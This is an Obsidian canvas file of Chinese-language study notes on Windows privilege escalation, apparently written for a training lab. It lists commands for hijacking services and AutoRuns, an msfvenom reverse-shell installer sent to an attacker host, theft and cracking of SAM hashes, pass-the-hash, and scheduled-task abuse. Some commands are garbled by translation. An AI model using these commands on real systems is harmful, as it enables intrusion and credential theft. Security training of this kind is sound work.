{
	"nodes":[
		{"id":"362a9a8dfc52ef26","type":"group","x":-520,"y":-1760,"width":2377,"height":1960,"label":"服务漏洞"},
		{"id":"af9121213ea60a5e","type":"group","x":-410,"y":1890,"width":2410,"height":770,"label":"密码"},
		{"id":"a3c1a6f41e9029dd","type":"group","x":-410,"y":780,"width":1190,"height":760,"label":"注册表"},
		{"id":"2bb19585bcf9976a","type":"group","x":-410,"y":2940,"width":560,"height":680,"label":"计划任务"},
		{"id":"f23e1ead73fa1a92","type":"text","text":"检查访问控制列表 （ACL） 中是否有与 `regsvc` 服务关联的注册表项。输出将显示谁对注册表项具有权限。\n```powershell\nGet-Acl -Path hklm:\\System\\CurrentControlSet\\services\\regsvc | fl\n```","x":-486,"y":-503,"width":506,"height":183},
		{"id":"2a2ab13b19d60c63","type":"text","text":"这个地方实现提权的方式是将目前的用户添加到高权限的组","x":-20,"y":-617,"width":250,"height":97},
		{"id":"8417389392fe9309","type":"text","text":"生成一个可以拿来提权的可执行文件作为服务运行的可执行文件：\n```\nreg add HKLM\\SYSTEM\\CurrentControlSet\\services\\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\\temp\\x.exe /f\n```","x":-486,"y":-260,"width":506,"height":200},
		{"id":"a56ab941c02705d2","type":"text","text":"查看权限：\n```\nC:\\Users\\User\\Desktop\\Tools\\Accesschk\\accesschk64.exe -wvu \"C:\\Program Files\\File Permissions Service\"\n```\n“Everyone”用户组对 filepermservice.exe 文件具有“FILE_ALL_ACCESS”权限","x":270,"y":-445,"width":510,"height":251},
		{"id":"f4d4cdc58eea603a","type":"text","text":"将生成的可执行文件覆盖原来的服务可执行文件：\n```\ncopy /y c:\\Temp\\x.exe \"c:\\Program Files\\File Permissions Service\\filepermservice.exe\"\n```","x":270,"y":-150,"width":510,"height":150},
		{"id":"e879b0fbe9c42731","x":423,"y":60,"width":205,"height":60,"type":"text","text":"重启：\nsc start filepermsvc"},
		{"id":"c3e8bcacb969f5a4","type":"text","text":"可执行文件","x":400,"y":-677,"width":250,"height":60},
		{"id":"82e82e7ceccb6b19","x":740,"y":60,"width":280,"height":60,"type":"text","text":"验证：\nnet localgroup administrators"},
		{"id":"cbce166e23deff3a","type":"text","text":"使用 accesschk.exe 检查 “user” 帐户对 “daclsvc” 服务的权限：\n\n`C:\\PrivEsc\\accesschk.exe /accepteula -uwcqv user daclsvc`\n\n请注意，“user” 帐户有权更改服务配置 （SERVICE_CHANGE_CONFIG）。\n\n查询服务并注意它以 SYSTEM 权限 （SERVICE_START_NAME） 运行：\n\n`sc qc daclsvc`\n\n修改服务配置并将 BINARY_PATH_NAME （binpath） 设置为您创建的reverse.exe可执行文件：\n\n`sc config daclsvc binpath= \"\\\"C:\\PrivEsc\\reverse.exe\\\"\"`\n\n在 Kali 上启动侦听器，然后启动服务以生成以 SYSTEM 权限运行的反向 shell：\n\n`net start daclsvc`","x":-500,"y":-1260,"width":520,"height":560},
		{"id":"e21bd927dea20c18","type":"text","text":"查询 “unquotedsvc” 服务，并注意它以 SYSTEM 权限 （SERVICE_START_NAME） 运行，并且BINARY_PATH_NAME未加引号且包含空格.\n\n`sc qc unquotedsvc`\n\n使用 accesschk.exe，请注意，允许 BUILTIN\\Users 组写入 C：\\Program Files\\Unquoted Path Service\\ 目录：  \n\n`C:\\PrivEsc\\accesschk.exe /accepteula -uwdq \"C:\\Program Files\\Unquoted Path Service\\\"`\n\n将您创建的reverse.exe可执行文件复制到此目录，并将其重命名为 Common.exe：\n\n`copy C:\\PrivEsc\\reverse.exe \"C:\\Program Files\\Unquoted Path Service\\Common.exe\"`\n\n在 Kali 上启动侦听器，然后启动服务以生成以 SYSTEM 权限运行的反向 shell：\n\n`net start unquotedsvc`","x":180,"y":-1260,"width":510,"height":520},
		{"id":"8b2b989cb83e99f0","type":"text","text":" Registry","x":-419,"y":-677,"width":250,"height":60},
		{"id":"ee69fbebb6f91295","type":"text","text":"查询 “regsvc” 服务，并注意它以 SYSTEM 权限运行 （SERVICE_START_NAME）.\n\n`sc qc regsvc`\n\n使用 accesschk.exe，请注意，regsvc 服务的注册表项可由“NT AUTHORITY\\INTERACTIVE“ 组（基本上是所有已登录的用户）:\n\n`C:\\PrivEsc\\accesschk.exe /accepteula -uvwqk HKLM\\System\\CurrentControlSet\\Services\\regsvc`\n\n覆盖 ImagePath 注册表项以指向您创建的reverse.exe可执行文件：\n\n`reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\\PrivEsc\\reverse.exe /f`\n\n在 Kali 上启动侦听器，然后启动服务以生成以 SYSTEM 权限运行的反向 shell：\n\n`net start regsvc`","x":770,"y":-1260,"width":510,"height":560},
		{"id":"038258d590847e95","type":"text","text":"查询 “filepermsvc” 服务，并注意它以 SYSTEM 权限运行 （SERVICE_START_NAME）.\n\n`sc qc filepermsvc`\n\n使用 accesschk.exe，请注意，每个人都可以写入服务二进制文件 （BINARY_PATH_NAME） 文件:\n\n`C:\\PrivEsc\\accesschk.exe /accepteula -quvw \"C:\\Program Files\\File Permissions Service\\filepermservice.exe\"`\n\n复制您创建的 reverse.exe 可执行文件，并将 filepermservice.exe 替换为它：\n\n`copy C:\\PrivEsc\\reverse.exe \"C:\\Program Files\\File Permissions Service\\filepermservice.exe\" /Y`\n\n在 Kali 上启动侦听器，然后启动服务以生成以 SYSTEM 权限运行的反向 shell：\n\n`net start filepermsvc`","x":1327,"y":-1260,"width":510,"height":520},
		{"id":"18b5f3d90ea4d986","type":"text","text":"验证：\nnet localgroup administrators","x":-100,"y":55,"width":300,"height":70},
		{"id":"be50872ab507076d","type":"text","text":"启动服务：\nsc start regsvc","x":-486,"y":55,"width":317,"height":70},
		{"id":"be5e42fa8709ed71","type":"text","text":"不安全的服务权限","x":-365,"y":-1400,"width":250,"height":60},
		{"id":"2f3ee6949db5f2ab","type":"text","text":"未加引号的服务路径","x":310,"y":-1400,"width":250,"height":60},
		{"id":"f4f8f42c6611f83b","type":"text","text":"AutoRuns","x":-255,"y":800,"width":250,"height":60},
		{"id":"351b4bf2f225d142","type":"text","text":"AlwaysInstallElevated","x":375,"y":800,"width":250,"height":60},
		{"id":"6699be0e5e1d20f3","type":"text","text":"注册管理机构权限较弱","x":900,"y":-1407,"width":250,"height":60},
		{"id":"a5365f7696fd93b6","type":"text","text":" 不安全的服务可执行文件","x":1457,"y":-1399,"width":250,"height":59},
		{"id":"88de18e53cf58f79","type":"text","text":"服务漏洞","x":588,"y":-1721,"width":250,"height":60},
		{"id":"2ef967837c702bcd","type":"text","text":"查询注册表中的 AutoRun 可执行文件：\n\n`reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run`\n\n使用 accesschk.exe，请注意，其中一个 AutoRun 可执行文件可由所有人写入：\n\n`C:\\PrivEsc\\accesschk.exe /accepteula -wvu \"C:\\Program Files\\Autorun Program\\program.exe\"`\n\n复制您创建的 reverse.exe 可执行文件，并用它覆盖 AutoRun 可执行文件 ：\n\n`copy C:\\PrivEsc\\reverse.exe \"C:\\Program Files\\Autorun Program\\program.exe\" /Y`\n\n在 Kali 上启动侦听器，然后重启 Windows VM。打开新的 RDP 会话以触发以管理员权限运行的反向 shell。您不必进行身份验证即可触发它，但是，如果有效负载未触发，请以管理员 （admin/password123） 身份登录以触发它。请注意，在实际参与中，您必须等待管理员自己登录！  \n\n`rdesktop MACHINE_IP`","x":-390,"y":960,"width":520,"height":560},
		{"id":"dff942083b15a8dd","type":"text","text":"查询注册表中的 AlwaysInstallElevated 键：\n```\nreg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated   \nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\n```\n请注意，这两个键都设置为 1 （0x1）。\n\n在 Kali 上，使用 msfvenom 生成反向 shell Windows 安装程序 （reverse.msi）。相应地更新 LHOST IP 地址：  \n\n`msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi`\n\n将 reverse.msi 文件传输到 Windows 上的 C：\\PrivEsc 目录（使用前面的 SMB 服务器方法）。\n\n在 Kali 上启动侦听器，然后运行安装程序以触发以 SYSTEM 权限运行的反向 shell：  \n\n`msiexec /quiet /qn /i C:\\PrivEsc\\reverse.msi`","x":240,"y":960,"width":520,"height":560},
		{"id":"60934b96b717ff20","type":"text","text":"注册表","x":-255,"y":1920,"width":250,"height":50},
		{"id":"46aa741c1128a650","type":"text","text":"保存的凭据","x":375,"y":1910,"width":250,"height":60},
		{"id":"262945bf2e9e9e47","type":"text","text":"Security Account Manager （SAM）","x":1004,"y":1920,"width":250,"height":60},
		{"id":"48bfd4256e8c4378","type":"text","text":"传递哈希","x":1600,"y":1920,"width":250,"height":60},
		{"id":"67b0ea3f37c48fa7","type":"text","text":"（由于某种原因，有时密码不会存储在注册表中。如果是这种情况，请使用以下作为答案：password123）  \n\n可以在注册表中搜索包含单词 “password” 的键和值：\n\n`reg query HKLM /f password /t REG_SZ /s`\n\n如果要节省一些时间，请查询此特定密钥以查找管理员 AutoLogon 凭据：\n\n`reg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\winlogon\"`\n\n在 Kali 上，使用 winexe 命令生成一个以管理员权限运行的命令提示符（使用您找到的密码更新密码）：\n\n`winexe -U 'admin%password' //MACHINE_IP cmd.exe`","x":-390,"y":2120,"width":520,"height":440},
		{"id":"bbbd163731b2d004","type":"text","text":"列出所有已保存的凭据：\n\n`cmd键 /list`\n\n请注意，将保存 “admin” 用户的凭据。如果不是，请运行 C：\\PrivEsc\\savecred.bat 脚本以刷新保存的凭据。\n\n在 Kali 上启动侦听器，并使用 runas 和 admin 用户保存的凭据运行 reverse.exe 可执行文件：\n\n`runas /savecred /user:admin C:\\PrivEsc\\reverse.exe`","x":240,"y":2120,"width":520,"height":320},
		{"id":"59ce10d8c6fbdcbb","type":"text","text":"SAM 和 SYSTEM 文件可用于提取用户密码哈希。此 VM 在 C：\\Windows\\Repair\\ 目录中不安全地存储了SAM 和 SYSTEM 文件的 备份。\n\n将 SAM 和 SYSTEM 文件传输到您的 Kali VM：\n\n`复制 C：\\Windows\\Repair\\SAM \\\\10.10.10.10\\kali\\   copy C：\\Windows\\Repair\\SYSTEM \\\\10.10.10.10\\kali\\`\n\n在 Kali 上，克隆 creddump7 存储库（Kali 上的存储库已过时，无法为 Windows 10 正确转储哈希值！）并使用它从 SAM 和 SYSTEM 文件中转储哈希值：\n\n`git clone https://github.com/Tib3rius/creddump7   pip3 安装 pycrypto   python3 creddump7/pwdump.py 系统 SAM`\n\n使用 hashcat 破解管理员 NTLM 哈希：\n\n`hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt`\n\n您可以使用破解的密码通过 winexe 或 RDP 以管理员身份登录。","x":869,"y":2120,"width":520,"height":520},
		{"id":"0380a5ea75acf1f1","type":"text","text":"当您可以使用哈希进行身份验证时，为什么还要破解密码哈希呢？\n\n将完整的 admin 哈希与 pth-winexe 结合使用，以 admin 身份生成一个 shell，而无需破解其密码。请记住，完整哈希包括 LM 和 NTLM 哈希，用冒号分隔：\n\n`pth-winexe -U 'admin%hash' //MACHINE_IP cmd.exe`","x":1470,"y":2120,"width":510,"height":240},
		{"id":"01f7fd025a434a45","type":"text","text":"计划任务","x":-255,"y":2960,"width":250,"height":60},
		{"id":"14dfc2eb4a18b1f1","type":"text","text":"查看 C：\\DevTools\\CleanUp.ps1 脚本的内容：\n\n`键入 C：\\DevTools\\CleanUp.ps1`\n\n该脚本似乎每分钟以 SYSTEM 运行一次。使用 accesschk.exe，请注意，您可以写入此文件：\n\n`C:\\PrivEsc\\accesschk.exe /accepteula -quvw user C:\\DevTools\\CleanUp.ps1`\n\n在 Kali 上启动侦听器，然后在 C：\\DevTools\\CleanUp.ps1 上附加一行，该行运行您创建的reverse.exe可执行文件：\n\n`echo C:\\PrivEsc\\reverse.exe >> C:\\DevTools\\CleanUp.ps1`\n\n等待 Scheduled Task 运行，这应该会触发反向 shell 作为 SYSTEM。","x":-390,"y":3160,"width":520,"height":440},
		{"id":"e084173e105f67d2","x":40,"y":860,"width":250,"height":60,"type":"text","text":"需要管理员账户登陆"}
	],
	"edges":[
		{"id":"baa386599b9f5370","fromNode":"be5e42fa8709ed71","fromSide":"bottom","toNode":"cbce166e23deff3a","toSide":"top"},
		{"id":"226f7c645b0f7647","fromNode":"2f3ee6949db5f2ab","fromSide":"bottom","toNode":"e21bd927dea20c18","toSide":"top"},
		{"id":"369f4fdbe12642f2","fromNode":"6699be0e5e1d20f3","fromSide":"bottom","toNode":"ee69fbebb6f91295","toSide":"top"},
		{"id":"c3cfbbbd76968af1","fromNode":"a5365f7696fd93b6","fromSide":"bottom","toNode":"038258d590847e95","toSide":"top"},
		{"id":"cd5dc06432d65923","fromNode":"88de18e53cf58f79","fromSide":"bottom","toNode":"be5e42fa8709ed71","toSide":"top"},
		{"id":"551230dfca483b4c","fromNode":"88de18e53cf58f79","fromSide":"bottom","toNode":"2f3ee6949db5f2ab","toSide":"top"},
		{"id":"dbcd1131d9953dd8","fromNode":"88de18e53cf58f79","fromSide":"bottom","toNode":"6699be0e5e1d20f3","toSide":"top"},
		{"id":"bc54b7b10ff53b2e","fromNode":"88de18e53cf58f79","fromSide":"bottom","toNode":"a5365f7696fd93b6","toSide":"top"},
		{"id":"295e2fa27e42e628","fromNode":"f4f8f42c6611f83b","fromSide":"bottom","toNode":"2ef967837c702bcd","toSide":"top"},
		{"id":"a26d8af2688a6e93","fromNode":"351b4bf2f225d142","fromSide":"bottom","toNode":"dff942083b15a8dd","toSide":"top"},
		{"id":"0f266aa5072d0ff6","fromNode":"60934b96b717ff20","fromSide":"bottom","toNode":"67b0ea3f37c48fa7","toSide":"top"},
		{"id":"33e6418f2371fb90","fromNode":"46aa741c1128a650","fromSide":"bottom","toNode":"bbbd163731b2d004","toSide":"top"},
		{"id":"bd60d0e2685c460f","fromNode":"262945bf2e9e9e47","fromSide":"bottom","toNode":"59ce10d8c6fbdcbb","toSide":"top"},
		{"id":"58f8ef90b9ced3e9","fromNode":"48bfd4256e8c4378","fromSide":"bottom","toNode":"0380a5ea75acf1f1","toSide":"top"},
		{"id":"c2cc4da3a34b541c","fromNode":"01f7fd025a434a45","fromSide":"bottom","toNode":"14dfc2eb4a18b1f1","toSide":"top"},
		{"id":"f1644055b1c10398","fromNode":"8b2b989cb83e99f0","fromSide":"bottom","toNode":"f23e1ead73fa1a92","toSide":"top"},
		{"id":"d297602b5d79fcae","fromNode":"2a2ab13b19d60c63","fromSide":"left","toNode":"8b2b989cb83e99f0","toSide":"right"},
		{"id":"c28b2fc97a848f85","fromNode":"f23e1ead73fa1a92","fromSide":"bottom","toNode":"8417389392fe9309","toSide":"top"},
		{"id":"a03f4cc780da9a92","fromNode":"8417389392fe9309","fromSide":"bottom","toNode":"be50872ab507076d","toSide":"top"},
		{"id":"3ccb2bc51e34a361","fromNode":"be50872ab507076d","fromSide":"right","toNode":"18b5f3d90ea4d986","toSide":"left"},
		{"id":"c876a0fe1a7575c1","fromNode":"c3e8bcacb969f5a4","fromSide":"bottom","toNode":"a56ab941c02705d2","toSide":"top"},
		{"id":"327185272e74a619","fromNode":"a56ab941c02705d2","fromSide":"bottom","toNode":"f4d4cdc58eea603a","toSide":"top"},
		{"id":"91a469b4ced35749","fromNode":"f4d4cdc58eea603a","fromSide":"bottom","toNode":"e879b0fbe9c42731","toSide":"top"},
		{"id":"811f74a2af507a38","fromNode":"e879b0fbe9c42731","fromSide":"right","toNode":"82e82e7ceccb6b19","toSide":"left"},
		{"id":"84da7083770c2ab3","fromNode":"e084173e105f67d2","fromSide":"left","toNode":"f4f8f42c6611f83b","toSide":"right"},
		{"id":"453e144ac61b6d7d","fromNode":"e084173e105f67d2","fromSide":"left","toNode":"2ef967837c702bcd","toSide":"top"}
	]
}